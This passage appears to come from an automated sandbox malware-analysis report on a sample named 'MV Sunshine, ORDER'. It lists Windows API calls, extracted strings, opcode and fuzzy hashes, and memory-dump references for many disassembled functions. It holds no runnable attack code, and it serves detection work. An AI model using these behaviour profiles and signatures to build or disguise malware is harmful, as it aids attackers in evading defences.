                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Cursor$Load$ErrorInfoLast
                      • String ID:
                      • API String ID: 3215588206-0
                      • Opcode ID: 0c4dfbdeb82d24b37dec2b9550e66dc822a50dc297eee3fd432a967e0a531998
                      • Instruction ID: e19be9b0fb21fb85593e76bf098801c8c82c0360880b3aa4919c8f19013544f2
                      • Opcode Fuzzy Hash: 0c4dfbdeb82d24b37dec2b9550e66dc822a50dc297eee3fd432a967e0a531998
                      • Instruction Fuzzy Hash: 0F415370E043196ADB109FBA8C4997EFFF8EF51B50B10452FA619E7290DAB8A401CF91
                      APIs
                      • GetClassNameW.USER32(?,?,00000100), ref: 009DAAA5
                      • __swprintf.LIBCMT ref: 009DAB46
                      • _wcscmp.LIBCMT ref: 009DAB59
                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009DABAE
                      • _wcscmp.LIBCMT ref: 009DABEA
                      • GetClassNameW.USER32(?,?,00000400), ref: 009DAC21
                      • GetDlgCtrlID.USER32(?), ref: 009DAC73
                      • GetWindowRect.USER32(?,?), ref: 009DACA9
                      • GetParent.USER32(?), ref: 009DACC7
                      • ScreenToClient.USER32(00000000), ref: 009DACCE
                      • GetClassNameW.USER32(?,?,00000100), ref: 009DAD48
                      • _wcscmp.LIBCMT ref: 009DAD5C
                      • GetWindowTextW.USER32(?,?,00000400), ref: 009DAD82
                      • _wcscmp.LIBCMT ref: 009DAD96
                        • Part of subcall function 009A386C: _iswctype.LIBCMT ref: 009A3874
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                      • String ID: %s%u
                      • API String ID: 3744389584-679674701
                      • Opcode ID: a549f2925bf2da5156bfef1dc4867f902704d9739e924268157860b122e9d9d9
                      • Instruction ID: dcbd00e64536465971bf9f24260e74a48398b7084aa59f0b225a7ae5fc4f1b58
                      • Opcode Fuzzy Hash: a549f2925bf2da5156bfef1dc4867f902704d9739e924268157860b122e9d9d9
                      • Instruction Fuzzy Hash: FEA10331244306AFDB14DF64C884BAAB7EDFF44315F00C62AF999D2690D734E966CB92
                      APIs
                      • GetClassNameW.USER32(00000008,?,00000400), ref: 009DB3DB
                      • _wcscmp.LIBCMT ref: 009DB3EC
                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 009DB414
                      • CharUpperBuffW.USER32(?,00000000), ref: 009DB431
                      • _wcscmp.LIBCMT ref: 009DB44F
                      • _wcsstr.LIBCMT ref: 009DB460
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 009DB498
                      • _wcscmp.LIBCMT ref: 009DB4A8
                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 009DB4CF
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 009DB518
                      • _wcscmp.LIBCMT ref: 009DB528
                      • GetClassNameW.USER32(00000010,?,00000400), ref: 009DB550
                      • GetWindowRect.USER32(00000004,?), ref: 009DB5B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                      • String ID: @$ThumbnailClass
                      • API String ID: 1788623398-1539354611
                      • Opcode ID: f1a24f978a76e87228e02e1e45115b9b527267c11dcd2901b9dd45d3c0dad551
                      • Instruction ID: 2d53ed483f6a91fccdeec7aed60a664bb26ba89e297900a1b76b9264c181a211
                      • Opcode Fuzzy Hash: f1a24f978a76e87228e02e1e45115b9b527267c11dcd2901b9dd45d3c0dad551
                      • Instruction Fuzzy Hash: CA81AC71048209DBDB10DF10D885FAABBECEF84714F04C56AFD859A2A2DB34DD46CBA1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                      • API String ID: 1038674560-1810252412
                      • Opcode ID: b8b73a0bae4f82126362c639ce8f858a35fb03ba617c638f45908dc9270b20a0
                      • Instruction ID: 8c2afe739bd6c5336d0e17e08abb042f3a1308214de712c13777156e9f34e2c2
                      • Opcode Fuzzy Hash: b8b73a0bae4f82126362c639ce8f858a35fb03ba617c638f45908dc9270b20a0
                      • Instruction Fuzzy Hash: 2B31D632588305F6DB14FA60CD43FEFB7A8AF64750F614816F551712D1EF91AE04C691
                      APIs
                      • LoadIconW.USER32(00000063), ref: 009DC4D4
                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009DC4E6
                      • SetWindowTextW.USER32(?,?), ref: 009DC4FD
                      • GetDlgItem.USER32(?,000003EA), ref: 009DC512
                      • SetWindowTextW.USER32(00000000,?), ref: 009DC518
                      • GetDlgItem.USER32(?,000003E9), ref: 009DC528
                      • SetWindowTextW.USER32(00000000,?), ref: 009DC52E
                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009DC54F
                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009DC569
                      • GetWindowRect.USER32(?,?), ref: 009DC572
                      • SetWindowTextW.USER32(?,?), ref: 009DC5DD
                      • GetDesktopWindow.USER32 ref: 009DC5E3
                      • GetWindowRect.USER32(00000000), ref: 009DC5EA
                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 009DC636
                      • GetClientRect.USER32(?,?), ref: 009DC643
                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 009DC668
                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009DC693
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                      • String ID:
                      • API String ID: 3869813825-0
                      • Opcode ID: 4eee1b45bb075a24fce026f87646ef038f7e4de399613fdcd59cbf909c91fc97
                      • Instruction ID: b5be74d7dcd10d46f9d1f72d1b8a2ab8c7da532ae5cc12d4d7228ad07bb07750
                      • Opcode Fuzzy Hash: 4eee1b45bb075a24fce026f87646ef038f7e4de399613fdcd59cbf909c91fc97
                      • Instruction Fuzzy Hash: C451607094070AAFDB20DFA8DD85B6EBBB9FF04705F004929F642A26A0D775E906CB50
                      APIs
                      • _memset.LIBCMT ref: 00A0A4C8
                      • DestroyWindow.USER32(?,?), ref: 00A0A542
                        • Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A0A5BC
                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A0A5DE
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A0A5F1
                      • DestroyWindow.USER32(00000000), ref: 00A0A613
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00980000,00000000), ref: 00A0A64A
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A0A663
                      • GetDesktopWindow.USER32 ref: 00A0A67C
                      • GetWindowRect.USER32(00000000), ref: 00A0A683
                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A0A69B
                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A0A6B3
                        • Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                      • String ID: 0$tooltips_class32
                      • API String ID: 1297703922-3619404913
                      • Opcode ID: 7ff2153c02ca5507591c0d643756d0c72fda226a8d77ad3e86d41c6e2f5977b1
                      • Instruction ID: 342c671fdbfa42c65367233220e35d7d67bd1a874f5a58897ee6cb3a49f750c8
                      • Opcode Fuzzy Hash: 7ff2153c02ca5507591c0d643756d0c72fda226a8d77ad3e86d41c6e2f5977b1
                      • Instruction Fuzzy Hash: 7E718675140349AFD720CFA8DC49F6A7BF6FB99300F084928F985972A1D772A942CB12
                      APIs
                        • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                      • DragQueryPoint.SHELL32(?,?), ref: 00A0C917
                        • Part of subcall function 00A0ADF1: ClientToScreen.USER32(?,?), ref: 00A0AE1A
                        • Part of subcall function 00A0ADF1: GetWindowRect.USER32(?,?), ref: 00A0AE90
                        • Part of subcall function 00A0ADF1: PtInRect.USER32(?,?,00A0C304), ref: 00A0AEA0
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00A0C980
                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A0C98B
                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A0C9AE
                      • _wcscat.LIBCMT ref: 00A0C9DE
                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A0C9F5
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00A0CA0E
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00A0CA25
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00A0CA47
                      • DragFinish.SHELL32(?), ref: 00A0CA4E
                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A0CB41
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                      • API String ID: 169749273-3440237614
                      • Opcode ID: b3f3728d0b79a6d59aaa43e367273b3aebbf772cc9dc2f9f4679c63b2760ab8c
                      • Instruction ID: b3bd8c343034cec36abbc0215b1be4585c736a872a072ea0fc2305e3c5255e35
                      • Opcode Fuzzy Hash: b3f3728d0b79a6d59aaa43e367273b3aebbf772cc9dc2f9f4679c63b2760ab8c
                      • Instruction Fuzzy Hash: 51615B71108305AFC711EFA4DC85E9BBBE8EBC9710F400A1DF591962A1DB719A4ACB52
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00A046AB
                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A046F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: BuffCharMessageSendUpper
                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                      • API String ID: 3974292440-4258414348
                      • Opcode ID: 76446d584b6ee65d9139746da5a5ac5fc45347152574915687c448cb4362afcd
                      • Instruction ID: 916235049a34ac7e288c7c26ec12c5b4dd7296b5bf7bb6d42d554953f94ae985
                      • Opcode Fuzzy Hash: 76446d584b6ee65d9139746da5a5ac5fc45347152574915687c448cb4362afcd
                      • Instruction Fuzzy Hash: 9B915BB42043059FCB14EF24D491B6AB7A1BF89354F04886DF9965B3A2DB31ED4ACB81
                      APIs
                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A0BB6E
                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00A06D80,?), ref: 00A0BBCA
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A0BC03
                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A0BC46
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A0BC7D
                      • FreeLibrary.KERNEL32(?), ref: 00A0BC89
                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A0BC99
                      • DestroyIcon.USER32(?), ref: 00A0BCA8
                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A0BCC5
                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A0BCD1
                        • Part of subcall function 009A313D: __wcsicmp_l.LIBCMT ref: 009A31C6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                      • String ID: .dll$.exe$.icl
                      • API String ID: 1212759294-1154884017
                      • Opcode ID: 752f88d2a7e1cd5c0a8f399c385624cfd97886cade2f0183df5e30f72c7e3af7
                      • Instruction ID: f8bab0cdc6d4b1e106a42b26026f94117fedaa3ddf2d07d907a7d96e478eac77
                      • Opcode Fuzzy Hash: 752f88d2a7e1cd5c0a8f399c385624cfd97886cade2f0183df5e30f72c7e3af7
                      • Instruction Fuzzy Hash: 3C61EE71A10219BFEB24DF64DD85FBE77A8FB09710F204619F915E61C0DB74AA81CBA0
                      APIs
                        • Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
                        • Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C
                      • CharLowerBuffW.USER32(?,?), ref: 009EA636
                      • GetDriveTypeW.KERNEL32 ref: 009EA683
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA6CB
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA702
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EA730
                        • Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                      • API String ID: 2698844021-4113822522
                      • Opcode ID: da59c731997926a7e0a63b1f2a734466c278e866d5ce699f570e15ce2d0cad61
                      • Instruction ID: d77be6e942b6588734a4d5cf0172e199e2c8f96ebc3bf6ac9e51f296be5b0bdc
                      • Opcode Fuzzy Hash: da59c731997926a7e0a63b1f2a734466c278e866d5ce699f570e15ce2d0cad61
                      • Instruction Fuzzy Hash: 8A5138751043449FC704EF21C981A6AB7E8FF98718F14496CF896973A1DB31EE0ACB92
                      APIs
                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009EA47A
                      • __swprintf.LIBCMT ref: 009EA49C
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 009EA4D9
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 009EA4FE
                      • _memset.LIBCMT ref: 009EA51D
                      • _wcsncpy.LIBCMT ref: 009EA559
                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009EA58E
                      • CloseHandle.KERNEL32(00000000), ref: 009EA599
                      • RemoveDirectoryW.KERNEL32(?), ref: 009EA5A2
                      • CloseHandle.KERNEL32(00000000), ref: 009EA5AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                      • String ID: :$\$\??\%s
                      • API String ID: 2733774712-3457252023
                      • Opcode ID: 69e1332b1e575e58348a06acab5db1cbc97ef0feb3f34f7a336dd51b196c437f
                      • Instruction ID: c2116a5d768d6021c1b0a3623cd2be5758f20e6a1e2d84ecf067e6f6447c5f61
                      • Opcode Fuzzy Hash: 69e1332b1e575e58348a06acab5db1cbc97ef0feb3f34f7a336dd51b196c437f
                      • Instruction Fuzzy Hash: 4131D271900259ABDB21DFA1DC48FEF37BCEF88700F1040B6FA08D6060EB709A458B25
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                      • String ID:
                      • API String ID: 884005220-0
                      • Opcode ID: 4ee4eb134f8175181e63d29936a4adad63703a5037766fb8439dc922e4828818
                      • Instruction ID: bcf3f9ebfbdbb3f182c78f1d34d5f83a23fd0a8e80f52989443c59d75ac5b93c
                      • Opcode Fuzzy Hash: 4ee4eb134f8175181e63d29936a4adad63703a5037766fb8439dc922e4828818
                      • Instruction Fuzzy Hash: D8612972900315EFDB209F68DE42BEA7BA9EF96332F104229E8159B1D1DB35CC41C792
                      APIs
                      • __wsplitpath.LIBCMT ref: 009EDC7B
                      • _wcscat.LIBCMT ref: 009EDC93
                      • _wcscat.LIBCMT ref: 009EDCA5
                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009EDCBA
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 009EDCCE
                      • GetFileAttributesW.KERNEL32(?), ref: 009EDCE6
                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 009EDD00
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 009EDD12
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                      • String ID: *.*
                      • API String ID: 34673085-438819550
                      • Opcode ID: 3b07df2851a70cdd36e94e53a23e937cdfd875a916141dc279ebac4ee0e80d29
                      • Instruction ID: 61afcb232f6e50ecec388da0c930e36a4b169a7e7f48cbe46c5c9796ec3c3c66
                      • Opcode Fuzzy Hash: 3b07df2851a70cdd36e94e53a23e937cdfd875a916141dc279ebac4ee0e80d29
                      • Instruction Fuzzy Hash: 9D81A2715052859FCB25EF25C885AAAB7E8BF88350F198C2EF889C7250E734DD45CB52
                      APIs
                        • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A0C4EC
                      • GetFocus.USER32 ref: 00A0C4FC
                      • GetDlgCtrlID.USER32(00000000), ref: 00A0C507
                      • _memset.LIBCMT ref: 00A0C632
                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A0C65D
                      • GetMenuItemCount.USER32(?), ref: 00A0C67D
                      • GetMenuItemID.USER32(?,00000000), ref: 00A0C690
                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A0C6C4
                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A0C70C
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A0C744
                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A0C779
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                      • String ID: 0
                      • API String ID: 1296962147-4108050209
                      • Opcode ID: 3d0bf4f1fd7c671384ecd6aff891f70c7a3e3512fa78080e2799b1c389a718c0
                      • Instruction ID: dc6ef9781f9c87d9317b15a5c8e9c4d2e4777bfb52f42459bf9cab7be43f7111
                      • Opcode Fuzzy Hash: 3d0bf4f1fd7c671384ecd6aff891f70c7a3e3512fa78080e2799b1c389a718c0
                      • Instruction Fuzzy Hash: 4881BF746083199FD720CF14E984A6BBBE8FF89324F00062DF99593291D771E906CFA2
                      APIs
                        • Part of subcall function 009D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009D8766
                        • Part of subcall function 009D874A: GetLastError.KERNEL32(?,009D822A,?,?,?), ref: 009D8770
                        • Part of subcall function 009D874A: GetProcessHeap.KERNEL32(00000008,?,?,009D822A,?,?,?), ref: 009D877F
